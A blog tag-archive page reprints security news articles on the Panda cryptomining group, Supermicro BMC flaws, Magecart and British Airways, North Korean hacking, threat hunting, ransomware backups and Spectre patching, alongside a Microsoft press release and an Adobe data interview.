Tag Archives: Threat

Global cryptomining attacks use NSA exploits to earn Monero

A new threat group has launched cryptomining attacks around the globe and is using exploits from the National Security Agency to spread its malware.

The threat group, dubbed ‘Panda,’ was revealed this week in a new report from Cisco Talos. Christopher Evans and Dave Liebenberg, threat researcher and head of strategic intelligence, respectively, at Cisco Talos, wrote that although the group is “far from the most sophisticated” it has been very active and willing to “update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts.”

“Panda’s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,” Evans and Liebenberg wrote in a blog post. “Our threat traps show that Panda uses exploits previously used by Shadow Brokers and Mimikatz, an open-source credential-dumping program.”

The NSA exploits include EternalBlue, which attacks a vulnerability in Microsoft’s Server Message Block (SMB) protocol. The researchers first became aware of Panda’s cryptomining attacks in the summer of 2018 and told SearchSecurity that over the past year they’ve seen daily activity in the organization’s honeypots.

“We see them in several of our honeypots nearly every day, which tells me they’re targeting a large portion of the internet,” Evans said. “Our honeypots are deployed throughout the world, and I’ve never seen a geographic focus of their attacks in the data. The applications they target are widely deployed, and without patching are easy targets.”

Since January, the researchers saw Panda’s cryptomining attacks changing by targeting different vulnerabilities — first a ThinkPHP web framework issue, then an Oracle WebLogic flaw — and using new infrastructure both in March and again over the past month.

“They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and [are] quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch,” the researchers wrote. “And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware.”

Liebenberg told SearchSecurity, “It appears that instead of employing good OpSec they focus on volume. That’s one reason why they’ll keep using old, burned infrastructure while still deploying new ones.” 

Evans and Liebenberg said in their research that the Panda group has made approximately 1,215 Monero (a cryptocurrency that emphasizes privacy), which equates to almost $100,000 today. One Monero is currently equal to $78, but the value of Monero has fluctuated — beginning the year around $50 and peaking over $110 in June.

The researchers have confirmed Panda cryptomining attacks against organizations in the banking, healthcare, transportation, telecommunications and IT services industries. Evans and Liebenberg also told SearchSecurity that the best way for organizations to detect if they have been attacked would be to “look for prolonged high system utilization, connections to mining pools using common mining ports (3333, 4444), watching for common malware persistence mechanisms, watching for DNS traffic to known mining pools and enabling the appropriate rules in your IDS.”

Go to Original Article
Author:

USBAnywhere vulnerabilities put Supermicro servers at risk

Security researchers discovered a set of vulnerabilities in Supermicro servers that could allow threat actors to remotely attack systems as if they had physical access to the USB ports.

Researchers at Eclypsium, based in Beaverton, Ore., discovered flaws in the baseboard management controllers (BMCs) of Supermicro servers and dubbed the set of issues “USBAnywhere.” The researchers said authentication issues put servers at risk because “BMCs are intended to allow administrators to perform out-of-band management of a server, and as a result are highly privileged components.

“The problem stems from several issues in the way that BMCs on Supermicro X9, X10 and X11 platforms implement virtual media, an ability to remotely connect a disk image as a virtual USB CD-ROM or floppy drive. When accessed remotely, the virtual media service allows plaintext authentication, sends most traffic unencrypted, uses a weak encryption algorithm for the rest, and is susceptible to an authentication bypass,” the researchers wrote in a blog post. “These issues allow an attacker to easily gain access to a server, either by capturing a legitimate user’s authentication packet, using default credentials, and in some cases, without any credentials at all.”

The USBAnywhere flaws make it so the virtual USB drive acts in the same way a physical USB would, meaning an attacker could load a new operating system image, deploy malware or disable the target device. However, the researchers noted the attacks would be possible on systems where the BMCs are directly exposed to the internet or if an attacker already has access to a corporate network.

Rick Altherr, principal engineer at Eclypsium, told SearchSecurity, “BMCs are one of the most privileged components on modern servers. Compromise of a BMC practically guarantees compromise of the host system as well.”

Eclypsium said there are currently “at least 47,000 systems with their BMCs exposed to the internet and using the relevant protocol.” These systems would be at additional risk because BMCs are rarely powered off and the authentication bypass vulnerability can persist unless the system is turned off or loses power.

Altherr said he found the USBAnywhere vulnerabilities because he “was curious how virtual media was implemented across various BMC implementations,” but Eclypsium found that only Supermicro systems were affected.

According to the blog post, Eclypsium reported the USBAnywhere flaws to Supermicro on June 19 and provided additional information on July 9, but Supermicro did not acknowledge the reports until July 29.

“Supermicro engaged with Eclypsium to understand the vulnerabilities and develop fixes. Supermicro was responsive throughout and worked to coordinate availability of firmware updates to coincide with public disclosure,” Altherr said. “While there is always room for improvement, Supermicro responded in a way that produced an amicable outcome for all involved.”

Altherr added that customers should “treat BMCs as a vulnerable device. Put them on an isolated network and restrict access to only IT staff that need to interact with them.”

Supermicro noted in its security advisory that isolating BMCs from the internet would reduce the risk to USBAnywhere but not eliminate the threat entirely . Firmware updates are currently available for affected Supermicro systems, and in addition to updating, Supermicro advised users to disable virtual media by blocking TCP port 623.

Go to Original Article
Author:

Data-driven operating model propels Adobe’s digital business success

Adobe stands as a textbook case of a software company that faced the threat of digital disruption head-on and emerged a winner. The company’s move from selling Photoshop software disks in a box to selling subscription-based digital media services online is based in no small part on its building a data-driven operating model.

Leading the data effort is Mark Picone, vice president for information and data services at Adobe. He works to ensure that data is curated, accurate and useful to the front-line teams that “turn the knobs on the business.”

In a video from the recent MIT Sloan CIO Symposium, Picone highlights the approaches Adobe teams took to build a data architecture that broke down data silos and consequently improved Adobe’s business analytics efforts.

“We treat the data as a product,” Picone explains. “Having a product approach to what we’re building allows us to build once and serve many and create a set of capabilities that is very impactful.”

Editor’s note: This transcript has been edited for clarity and length.

What role do data services play in digital transformation at Adobe? What is the model?

Mark Picone: Our job really is to be an enabler for the company and enable the company to be data driven. There are a lot of things that make that very difficult. You can say data is developed, and it’s created all over the place. But how can you create a [data-driven operating] model such that the data is stitched together, it’s curated, it’s governed, it’s the right data, it’s correct? [Only] then can you create mechanisms to be able to better communicate with customers, or engage the customers or just better understand your business.

[The] single view of the customer … is based on very strong governance techniques and a unified data architecture.
Mark PiconeAdobe

We’ve done that with this data-driven operating model. The data-driven operating model has really allowed us to look across all of the silos that we had four or five years ago that really was as a result of going to the cloud and going into subscriptions and rationalize that together to create a single view of the customer.

That single view of the customer, though, is based on very strong governance techniques and also a unified data architecture. Combined with that, we are able to take what I call an ‘outside-in approach’ of creating customer journeys.

The customer journey — which, for our consumer-based business, [involves products like] Photoshop, InDesign, and Illustrator — [the customer steps are] discover, try, buy, use and renew. Across every one of those steps, we actually assigned owners and organizations to own those different KPIs [key performance indicators] within that journey step — and, then, to create calls to action.

That outside-in approach allowed us to create data sets and analytical experiences that we now use to run the entirety of our digital media business. And it’s been transformational from a number of different points.

When we close the business every week, there’s a group of over 100 people that get together and look at the single source of truth … journey step by journey step, and they understand what’s happening in that market. Did our annual recurring revenue go up or down? What was traffic? What were the ads? What were the promotions? And they basically use that to turn the knobs on the business. … They do that on a week-in, week-out basis. …

How can data play a role in achieving operational efficiencies?

Picone: The operational efficiencies come [from] reporting the same metrics up to management in the same way. There’s no question about what that metric is. …

But, really, the true value is in how we run that business. The way we do ad spend has radically changed, the way we do targeting and testing has radically changed because we now have a purview of every product across every geography, across every route to market.

And, when you make those decisions now, you actually see how the annual recurring revenue took place for [individual] customers over time. It is the same thing when we do A/B targeting. …

We’ve taken this whole [data-driven] digital operating model and created a playbook. And this didn’t happen when we created, it happened after we actually did it, and we said, ‘Wow, there’s a lot of reusability here.’ — not just from a systems and a capabilities perspective, like platforms, governance and data architecture, but really from the methodology. The methodology really allows us to have this inside-out approach of understanding all of your data assets, categorizing them, creating a database that has the lowest level of granularity, gets curated and is ready for analytics. …

Then, you combine that with that top-down approach, which is customer journey steps, assigned organizations and processes, and that yields actionable results. And we’re actually taking that [digital business] model and rolling it out to other parts of our business, even internal organizations and finance — as an example, procurement to pay. …

We treat the data as a product. We are an internal team. Our customers are all largely internal — although the data we create personalizes real-time experiences within the products. …

And we’ve introduced a step over the past year that we call ‘code development.’ And that’s where we really open source the data. So, now, the data is available for others to bring their engineers or third parties, whatever the case may be, to come into our environment and actually build data assets and expand the nucleus of what we call our ‘unified data architecture.’

So, having a product approach to what we’re building allows us to build once and serve many and create a set of capabilities that is very impactful. We are spending less and less time creating data sets and visualizations and more time creating capabilities that will actually enable the entirety of the organization.

View All Videos

Go to Original Article
Author:

British Airways data breach may be the work of Magecart

The British Airways data breach may have been the handiwork of the threat actor group known as Magecart.

Security researchers at the threat intelligence company RiskIQ Inc., reported that they suspect Magecart was behind the late August British Airways data breach, based on their analysis of the evidence. The Magecart group focuses on online credit card skimming attacks and is believed to be behind the Ticketmaster data breach discovered in June 2018.

British Airways reported it had suffered a breach on Sept. 6 that affected around 380,000 customers. The company said personal and payment information were used in payment transactions made on the website and the mobile app between Aug. 21 and Sept. 5.

In a blog post published a week later, RiskIQ researcher Yonathan Klijnsma said that because the British Airways data breach announcement stated that the breach had affected the website and mobile app but made no mention of breaches of databases or servers, he noticed similarities between this incident and the Ticketmaster breach.

The Ticketmaster breach was caused by a web-based credit card skimming scheme that targeted e-commerce sites worldwide. The RiskIQ team said that the Ticketmaster breach was the work of the hacking group Magecart, and was likely not an isolated incident, but part of a broader campaign run by the group.

The similarities between the Ticketmaster breach and the reports of the British Airways data breach led Klijnsma and the RiskIQ team to look at Magecart’s activity.

“Because these reports only cover customer data stolen directly from payment forms, we immediately suspected one group: Magecart,” Klijnsma wrote. “The same type of attack happened recently when Ticketmaster UK reported a breach, after which RiskIQ found the entire trail of the incident.”

Klijnsma said they were able to expand the timeline of the Ticketmaster activity and discover more websites affected by online credit card skimming.

“Our first step in linking Magecart to the attack on British Airways was simply going through our Magecart detection hits,” Klijnsma explained. “Seeing instances of Magecart is so common for us that we get at least hourly alerts for websites getting compromised with their skimmer-code.”

He noted that in the instance of the British Airways data breach, the research team had no notifications of Magecart’s activity because the hacking group customized their skimmer. However, they examined British Airways’ web and mobile apps specifically and noticed the similarities — and the differences.

The fact they likely had access long before the attack even started is a stark reminder about the vulnerability of web-facing assets.
Yonathan Klijnsmathreat researcher, RiskIQ

“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately,” Klijnsma wrote. “This particular skimmer is very much attuned to how British Airway’s (sic) payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer.”

Klijnsma also said it was likely Magecart had access to the British Airways website and mobile app before the attack reportedly started.

“While we can never know how much reach the attackers had on the British Airways servers, the fact that they were able to modify a resource for the site tells us the access was substantial, and the fact they likely had access long before the attack even started is a stark reminder about the vulnerability of web-facing assets,” he wrote.

Magecart, RiskIQ noted, has been active since 2015 and has been growing progressively more threatening as it customizes its skimming schemes for particular brands and companies.

In other news

  • President Donald Trump signed an executive order this week that imposes sanctions on anyone who attempts to interfere with U.S. elections. After Russian interference in the 2016 U.S. presidential election, there are fears that there will be further interference in the upcoming 2018 midterm election. In response to those fears, Trump signed an executive order that sanctions would be placed on foreign companies, organizations or individuals who have interfered with U.S. elections. The order says that government agencies must report any suspicious, malicious activity to the director of national intelligence, who will then investigate the report and determine its validity. If the director of national intelligence finds that the suspect group or individual has interfered, there will be a 45-day review and assessment period during which the Department of Justice and Homeland Security will decide whether sanctions are warranted. If they are, the foreign group or individual could have their U.S. assets frozen or be banned from the country.
  • A vulnerability in Apple’s Safari web browser enables attackers to launch phishing attacks. Security researcher Rafay Baloch discovered the vulnerability and was also able to replicate it in the Microsoft Edge browser. Baloch published the proof of concept for both browser vulnerabilities early this week, and while Microsoft had addressed the issue in its August Patch Tuesday release — citing an issue with properly parsing HTTP content as the cause — Apple has yet to issue any patches for it. The vulnerability in Safari iOS 11.3.1 could thus still be used to spoof address bars and trick users into thinking they are visiting a legitimate site that is actually malicious.
  • The hacker known as “Guccifer” will be extradited to the U.S. to serve a 52-month prison sentence. A Romanian court ruled that the hacker, who is known for exposing the misuse of Hillary Clinton’s private email server before the 2016 U.S. presidential election and whose real name is Marcel Lehel Lazar, will be extradited to America to serve his 52-month sentence after finishing his seven-year sentence in Romania — his home country. Lazar pleaded guilty in May 2016 to charges of unauthorized access to a protected computer and aggravated identity theft. Lazar is believed to have hacked into the accounts of around 100 people between 2012 and 2014, including former Secretary of State Colin Powell, CBS Sports’ Jim Nantz and Sidney Blumenthal, a former political aide to Bill Clinton and adviser to Hillary Clinton.

North Korea hacking threat still looms despite summit

Times may be changing for diplomatic relations between North Korea and the U.S., but the threat of North Korean hacking still looms.

This week’s summit between President Donald Trump and North Korean leader Kim Jong Un could lead to improved relations between the two countries and a possible denuclearization plan for North Korea. However, it’s unclear what impact, if any, the summit may have on nation-state cyberattacks coming from the country. According to various reports from the summit, the talks between Kim and Trump did not include any provisions concerning cyberattacks, and several cybersecurity companies have said there is evidence that North Korean hacking attacks may be ramping up this year.

Several notable cyberattacks have been attributed to the North Korean government in recent years, including the 2014 breach of Sony Pictures and last summer’s global WannayCry ransomware attacks. In addition, the FBI and the Department of Homeland Security recently issued a security advisory tying two well-known malware campaigns, Joanap and Brambul, to the North Korea hacking group Hidden Cobra, also known as Lazarus Group.

Priscilla Moriuchi, director of strategic threat development at Recorded Future, a threat intelligence provider based in Somerville, Mass., told SearchSecurity that while Kim’s regime wants to increase the country’s role in the international community, there’s no indication the government has curbed its hacking efforts.

In fact, she said there are signs that the opposite may be occurring.

“What we can say from looking at the data is that there are two stories: the data story, which shows us that North Korea increasingly cares about being monitored and watched, and that they are taking measures to hide their activity online; and the diplomacy story, where it’s telling the rest of the world that it’s ready to denuclearize and be more transparent,” Moriuchi said. “And the two stories just don’t match up.”

Recorded Future published research in April that showed a massive increase in anonymization of North Korean internet activity. “We conducted the research back in July, and we saw, for example, that less than 1% of all web browsing activity was anonymized — they didn’t even use HTTPS most of the time, let alone [virtual private networks (VPNs)],” she said, either because they didn’t care about hiding activity or because they didn’t know they could anonymize traffic. “But six months later, it was a completely different story — there was about a 12,000% increase in anonymization services and technology.”

Recorded Future issued another report last week detailing an increasingly large presence of U.S. technology in North Korean networks and usage by North Korean leadership, despite economic sanctions that prevent such trade. Moriuchi said North Korea has “professionalized sanctions evasion” over the last three-plus decades and found various ways to exploit weaknesses in U.S. export controls.

“We think this is a problem for two reasons. First, there are gaping holes in U.S. export control regime, and they’re being exploiting by this rogue nation,” she said. “Second, the U.S. government doesn’t want U.S. technology being used in cyberattacks from North Korea to harm businesses and government agencies.”

If Kim agrees to a denuclearization plan, there may be less incentive for the government to drops its hacking operations. Ross Rustici, senior director of intelligence services at Boston-based threat detection vendor Cybereason, believes North Korea’s hacking operations are a crucial bargaining chip for Kim and also present a unique threat to the Trump administration.

“North Korea currently lacks many options to force the U.S. into working inside a START [Strategic Arms Reduction Treaty] framework. Almost all of its military and foreign policy capabilities are defensive at this point,” Rustici wrote in a research post last month, prior to the summit. “The one exception is its cyberprogram. And, unfortunately, this is one domain where North Korea can impact the Trump brand in a way that it could not against any other President.”

Several vendors have reported increased sophistication and capabilities from suspected North Korean hacking groups this year. For example, Dragos Inc., a security firm based in Hanover, Md., that specializes in industrial control systems (ICS), published a threat report on a group it calls Covellite, which the company said uses malware and infrastructure similar to Hidden Cobra.

Dragos noted that Covellite, which had targeted U.S. organizations in the past, had recently abandoned North American companies and focused its attacks on European and Asian companies. Dragos also said that while Covellite lacks ICS-specific capabilities at this time, the group’s “rapidly improving capabilities, and history of aggressive targeting” made it a primary threat to the ICS industry.  

In addition to Hidden Cobra, FireEye earlier this year reported that another North Korean hacking group known as APT37 had demonstrated increased capabilities, including the use of an Adobe Flash zero-day vulnerability in attacks on South Korean targets. “Our analysis of APT37’s recent activity reveals that the group’s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware,” FireEye wrote, adding it has “high confidence” that the group is working on behalf of the North Korean government.

Threat hunting technology is on the rise, so are threats

More companies are adopting threat hunting functions, according to a recent survey from Crowd Research Partners, but detection of advanced threats remains elusive.

Threat hunting typically involves human security analysts identifying impending incidents or attacks that automated threat detection systems may have missed. The frequency of threats and the potential damage and impact of security incidents continue to outpace the capabilities of security operations centers (SOC), Crowd Research Partners’ “2018 Threat Hunting Report” found.

Fifty-eight percent of IT security professionals said cyberthreats against their organizations had doubled during the past 12 months; only 8% indicated threats decreased. SOCs, on average, missed 39% of threats, with the majority of attacks discovered in one to seven days for 58% of organizations. The average dwell time for attackers was 30 days.

The top challenges facing SOCs, according to those surveyed, included the following:

  • detection of advanced cyberthreats — hidden, unknown and emerging threats (55%);
  • lack of skilled personnel (43%);
  • lack of confidence in threat detection technologies (36%);
  • too much time wasted on false alerts (35%);
  • slow response time to find or detect advanced threats (31%);
  • outdated SIEM and SOC infrastructure (29%); and
  • lack of proper reporting tools (28%).

In order to offset some of these challenges, the report found that approximately one-third of the organizations surveyed had outsourced threat hunting to a managed security service provider.

Crowd Research Partners conducted an online survey of more than 461 security and IT professionals in the Information Security Community group on LinkedIn. The survey features respondents from industries such as technology (17%); financial services, banking and insurance (14%); telecommunications (6%); and healthcare (5%). Government cybersecurity professionals represented 20% of those surveyed.

Mix of analysts and tools

According to the survey, 40% of respondents reported that security analysts at their organizations used threat hunting platforms, up 5 percentage points from a similar survey in 2017. Benefits ranged from improved detection of advanced threats to less time spent coordinating events. The top indicators of compromise most frequently investigated by security analysts included behavior anomalies (67%), IP addresses (58%), domain names (46%), denied or flagged connections (46%) and file names (32%).

Security operations centers had more analysts hunting in 2018, at 17%, compared with 14% in 2017. More than half, however, have five or fewer analysts in their SOCs dedicated to threat hunting, the report found.

While security operations centers at some organizations are maturing, along with a greater awareness of threat hunting, 33% of those surveyed indicated limited SOC capabilities when it came to emerging threats; 28% said their SOC was advanced; 24% reported it was compliant, but behind the curve; and only 15% said their SOC was cutting-edge. 

Companies used a variety of tools for threat hunting. The top technologies included the following:

  • next-generation firewalls, intrusion prevention systems and antivirus software (55%);
  • SIEM (50%);
  • antiphishing or other messaging security software (49%);
  • threat intelligence platforms (39%);
  • enrichment and investigation tools (34%); and
  • vulnerability management (32%).

The majority of threat hunting was performed in-house (56%). Some companies used a hybrid of in-house and service provider (22%); others outsourced threat hunting (11%). Meanwhile, 11% of survey respondents reported that their organizations did “no proactive threat hunting.”

Security analysts at 60% of the organizations said they do not currently use threat hunting platforms or techniques. However, six out of 10 organizations indicated plans to build a threat hunting program in the next three years, according to the “2018 Threat Hunting Report,” which is produced in partnership with multiple vendors.

Barriers to adoption ranged from lack of budget (45%) to untrained personnel (7%). The tools desired most often for threat hunting included threat intelligence (69%), user and entity behavior analytics (57%), automatic detection (56%), and machine learning and automated analytics (56%).

According to proponents of threat hunting programs, such as David Bianco, who served as a technology adviser for Sqrrl Data Inc., before the startup company was acquired by Amazon Web Services earlier this year, one of the benefits is security teams can take what they find and use it to improve automated detection.

Microsoft announces new intelligent security innovations to help businesses manage threats from cloud to edge

Amid evolving digital threats, an innovative IoT security solution, integrated threat intelligence and advanced protection in Microsoft 365 help simplify cybersecurity for businesses

SAN FRANCISCO — April 16, 2018 At a news conference on Monday, Microsoft Corp. announced several new intelligent security tools and technologies to help enterprises more easily secure their data and networks against today’s biggest threats as well as address emerging threats aimed at IoT and edge devices. These new solutions build on Microsoft’s longstanding approach to delivering innovation that customers and partners can build upon to strengthen the broader ecosystem against cyberattacks from the cloud to the edge.

“As last year’s devastating cyberattacks demonstrated, security threats are evolving and becoming even more serious,” said Brad Smith, president of Microsoft. “The tech sector’s innovations need to accelerate to outpace security threats. Today’s steps bring important security advances not just to the cloud, but to the billions of new devices that are working on the edge of the world’s computer networks.”

Securing a new generation of connected devices: announcing Azure Sphere

Microsoft is harnessing the power of the intelligent cloud to address emerging threats against a new class of connected devices, those relying on a chip the size of a thumbnail called a microcontroller unit (MCU). MCU-powered devices are already the most populous area of computing with roughly 9 billion new devices every year. They are found in everything from toys and household appliances to industrial equipment — and attackers are starting to target them. To bring security to this next generation of connected devices, Microsoft is introducing Azure Sphere, the industry’s first holistic platform for creating highly secured, connected MCU devices on the intelligent edge. Featuring an entirely new class of MCUs with more than five times the power of legacy MCUs, an OS custom built for IoT security, and a turnkey cloud security service that guards every Azure Sphere device. With Azure Sphere, Microsoft extends the boundaries of the intelligent edge, to power and secure an entirely new category of devices.

“As our homes become more connected, we place significant value on the security of connected devices, so we can focus on continuing to deliver an exceptional customer experience,” said Brian Jones, director of Product Strategy and Marketing at Sub-Zero Group Inc. “Microsoft’s approach with Azure Sphere is unique in that it addresses security holistically at every layer.”

Microsoft 365 Intelligent Security Solutions: Simplifying Security

As security threats become more complex, companies are increasingly finding that the intelligence and threat protection tools they need to remain a step ahead of attackers are in the cloud. Today, Microsoft introduced several new intelligent security features for its Microsoft 365 commercial cloud offering designed to help IT and security professionals simplify how they manage security across their enterprises:

Advanced tools that make it easier to prevent threats before they happen

  • To help teams stay prepared and ahead of threats, Microsoft today released Microsoft Secure Score and Attack Simulator. Secure Score makes it easier for organizations to determine which controls to enable to help protect users, data and devices by quickly assessing readiness and providing an overall security benchmark score. It will also let organizations compare their results to those with similar profiles using built-in machine learning. Attack Simulator, a part of Office 365 Threat Intelligence, lets security teams run simulated attacks — including mock ransomware and phishing campaigns — to event-test their employees’ responses and tune configurations accordingly.

Automated threat detection and remediation to free up security operations teams

  • With the latest Windows 10 update, now in preview, Windows Defender Advanced Threat Protection (ATP) works across other parts of Microsoft 365 to include threat protection and remediation spanning Office 365, Windows and Azure. Also available today in preview, and with the upcoming Windows 10 update, are new automated investigation and remediation capabilities in Windows Defender ATP, leveraging artificial intelligence and machine learning to quickly detect and respond to threats on endpoints, within seconds, at scale.
  • Conditional Access provides real-time risk assessments to help ensure that access to sensitive data is appropriately controlled, without getting in the way of users’ productivity. Microsoft 365 is now adding the device risk level set by Windows Defender ATP to Conditional Access in preview to help ensure that compromised devices can’t access sensitive business data.

Stronger partnerships to give customers more integrated solutions

  • The intelligence data used to quickly detect and respond to threats improves as more relevant signals are added. Machine learning tools are only as good as the data they receive. Microsoft’s security products are informed by the trillions of diverse signals feeding into the Microsoft Intelligent Security Graph. Today, Microsoft announced a preview of a new security API for connecting Microsoft Intelligent Security Graph-enabled products as well as intelligence from solutions built by customers and technology partners to greatly enhance the fidelity of intelligence.

Most security tools report an attack from a single limited perspective, offering insight into one piece of a potentially larger threat. By connecting individual tools to the Intelligent Security Graph, security teams get new perspectives and more meaningful patterns of data to speed up threat investigation and remediation. The new API is in early testing with a select group of cybersecurity industry leaders that are collaborating with Microsoft to shape its development. The group, which includes Anomali, Palo Alto Networks and PwC, joined Microsoft today to share their own early exploration of the API and how it may improve each company’s ability to protect their mutual customers.

  • Microsoft also is announcing a new Microsoft Intelligent Security Association for security technology partners so they can benefit from, and contribute to, the Intelligent Security Graph and Microsoft security products. Members of the association will be able to create more integrated solutions for customers that provide greater protection and detect attacks more quickly. Palo Alto Networks and Anomali join PwC and other existing partners as founding members of the new association.

Microsoft is partnering with customers through their digital transformation by making it easier for them to help keep assets secure from the cloud to the edge.

More information on Microsoft’s security announcements can be found at the Microsoft Security News site.

Microsoft (Nasdaq “MSFT” @microsoft) enables digital transformation for the era of an intelligent cloud and an intelligent edge. Its mission is to empower every person and every organization on the planet to achieve more.

For more information, press only:

Microsoft Media Relations, WE Communications, (425) 638-7777,

[email protected]

Note to editors: For more information, news and perspectives from Microsoft, please visit the Microsoft News Center at http://news.microsoft.com. Web links, telephone numbers and titles were correct at time of publication, but may have changed. For additional assistance, journalists and analysts may contact Microsoft’s Rapid Response Team or other appropriate contacts listed at http://news.microsoft.com/microsoft-public-relations-contacts.

 

The post Microsoft announces new intelligent security innovations to help businesses manage threats from cloud to edge appeared first on Stories.

Ransomware outbreak threat calls for backup and DR strategy

The ransomware outbreak threat may be subsiding somewhat, but IT managers continue to shore up their defenses. Backup and disaster recovery is a key area of emphasis.

For much of 2017, the WannaCry and NotPetya ransomware outbreaks dominated cybercrime headlines. A new report from antimalware vendor Malwarebytes said ransomware detections last year increased 90% among businesses. But by the end of 2017, the “development of new ransomware families grew stale,” as cybercriminals shifted their focus to other forms of malware, such as banker Trojans that steal financial information, according to the report, “Cybercrime Tactics and Techniques: 2017 State of Malware.”

That said, organizations are looking to bolster their ransomware outbreak protections. Front-end measures often include antivirus software, firewalls and content scanners that can intercept email attachments that appear questionable.

IT departments, however, are also looking to strengthen back-end protections that can help them recover from ransomware attacks that lock up data via encryption. Here, the emphasis is on disaster recovery strategies that let a business restore its data from a backup copy. But even here, there are risks: IT managers must ensure the backups it makes are actually usable and consider how long a data restore will take in the event of an emergency.

Another level of security

The city of Milpitas, Calif., already has a number of security measures in place to defend itself from a ransomware outbreak. On the front end, the municipal government employs email filtering, spam filtering and email attachment scanning. On the back end, the city uses BackupAssist, a Windows server backup and recovery software offering for SMBs. A remote disaster recovery site provides an additional line of defense.

The city earlier this month said it layered on another element to its backup and recovery defense. Mike Luu, information services director for the city of Milpitas, said the city activated CryptoSafeGuard, a BackupAssist feature the vendor recently added to its product.

CryptoSafeGuard, according to the company, prevents infected files from being backed up and also prevents backups from becoming encrypted. Some ransomware attacks have succeeded in encrypting both an organization’s production and backup data.

“It’s just another method of trying to protect against [Ransomware],” Luu said of CryptoSafeGuard.

Luu said switching on CryptoSafeGuard was a simple matter of ticking a box on BackupAssist’s user interface. “It came along for the ride at no additional cost,” he added.

BackupAssist offers CryptoSafeGuard as part of the vendor’s BackupCare subscription package. Troy Vertigan, digital sales and marketing manager at BackupAssist, said 30% of the vendor’s customers running the latest versions of BackupAssist have activated CryptoSafeGuard since it became available in September 2017.

When backups fail

Backup plans can fall through when ransomware hits. TenCate, a maker of composite materials and armor based in the Netherlands, found that out a few years ago during the CryptoLocker ransomware outbreak. Malware entered the company’s U.S. operations through a manufacturing facility and made its way to the file server, recalled Jayme Williams, senior systems engineer at TenCate. Data ended up encrypted from the shop floor to the front office.

When TenCate attempted a data restore from Linear Tape-Open standard tape backups, the backup software the company used wasn’t able to catalog the LTO tapes — a necessary step for recovering files. Williams said some data had been copied off to disk media, but that backup tier was also unreadable. He contacted a data recovery service, which was able to extract the data from the disks.

The company’s disk-based backups weren’t frequent, so some of the data had become stale. The recovered data, however, provided a framework for rebuilding what was lost. It took two weeks to make data accessible again; even then, it wasn’t an ideal data restore because of the age of the recovered data.

One of the key lessons learned from the CryptoLocker experience was that TenCate’s security was lacking for the ransomware infection to penetrate as far as it did, Williams noted. In response, company managers have signed off on tighter security.

The other lesson: Backup and disaster recovery are different things.

Backup is not resilience.
Jayme Williamssenior systems engineer at TenCate

“Backup is not resilience,” Williams said.

That realization put TenCate on the path toward new approaches. Initially, the company, which is a VMware shop, considered the virtualization vendor’s Site Recovery Manager. But the company’s IT services partner recommended a cloud-based backup and disaster recovery offering from Zerto. The vendor replicates data from an organization’s on-site data stores to the cloud.

One factor in favor of Zerto was simplicity. Zerto helped TenCate set up a proof of concept (POC) in about 30 minutes to demonstrate replication and failover. When Williams received permission to purchase the replication service, TenCate was able to take the POC into production without reinstallation.

When a second ransomware outbreak struck TenCate, the updated security and disaster recovery system thwarted the attack. The company’s virtual machines (VMs) were shielded within Zerto’s Virtual Protection Groups and journaling technique, which Williams described as “the TiVo of the VM.” The Zerto journal lets administrators rollback a VM to a point in time before the ransomware virus hit — a matter of seconds, according to Williams.

Time is a critical consideration in devising a ransomware mitigation strategy, noted Michael Suby, Stratecast vice president of research at Frost & Sullivan.

A too lengthy data restore process leaves organizations vulnerable to ransomware demands, he said. A besieged organization may capitulate and pay the fee if a drawn out recovery time would result in a greater loss of revenue or threaten lives, as in the case of an attack against a hospital.

“Companies can still be exploited if the time to revert to those backup files is excessive,” Suby explained. “It’s not just having backup files. We have to have them readily accessible.”

No need to rush network patching for Spectre and Meltdown

The recently discovered security threat in CPUs from nearly a dozen manufacturers poses a low risk to corporate networking gear, so operators have time to test vendors’ patches thoroughly.

That’s the take of security experts contacted by SearchNetworking following the discovery last week of the Spectre and Meltdown vulnerabilities that affect Intel, AMD and ARM chips. In response, Cisco and Juniper Networks have released patches rated medium and low risk, respectively, for a variety of products.

The low risk of Spectre and Meltdown to switches and routers means network managers have the time to thoroughly test the patches to minimize their impact on hardware performance, experts said.

“If you’re getting a firmware update, you need to patch,” said Rob Westervelt, analyst at IDC. “[But] the issue is whether you just deploy the patch or test it thoroughly and make sure you don’t break any applications or anything else.”

Roughly 20 CSOs and IT security professionals interviewed by IDC were taking a methodical approach to applying Spectre and Meltdown fixes across all systems.

“While it is top of mind, it’s not something that they’re immediately jumping on to patch,” Westervelt said. “They are using established best practices and testing those patches first.”

Network performance at risk

Westervelt warned there is the possibility network performance will suffer. “In some cases, it could be very costly.”

If you’re getting a firmware update, you need to patch.
Rob Westerveltanalyst at IDC

Indeed, Microsoft reported in a blog post patches for the PC and server versions of Windows would range from minor to significant, depending on the age of the operating system and the CPU. “I think we can expect a similar variety of performance impacts across other [vendors’] products,” said Jake Miller, a senior security analyst at IT consulting firm Bishop Fox, based in Tempe, Ariz.

Security pros expect hackers sophisticated enough to exploit the hard-to-reach vulnerabilities to target mostly servers in large data centers that host cloud computing environments. Because of the level of expertise needed to take advantage of the flaws, hackers working for nation states are the most likely attackers, experts said.

Exploiting the CPU holes would involve crafting code that takes advantage of how some processors anticipate features computer users will request next. In preparation for those requests, processors will load into memory valuable data and instructions that hackers can steal.

“The threat is significant, but currently is limited to highly sophisticated attackers and hacking groups with the means to carry out multi-staged targeted attacks,” IDC said in a research note. “Financially motivated cybercriminals are more likely to continue to use more accessible, time-tested methods to retrieve passwords and sensitive data.”

Nevertheless, even a low risk to networking gear is worth the time needed for fixing. “It’s better to be safe than sorry,” said Jonathan Valamehr, COO and co-founder of cybersecurity company Tortuga Logic Inc.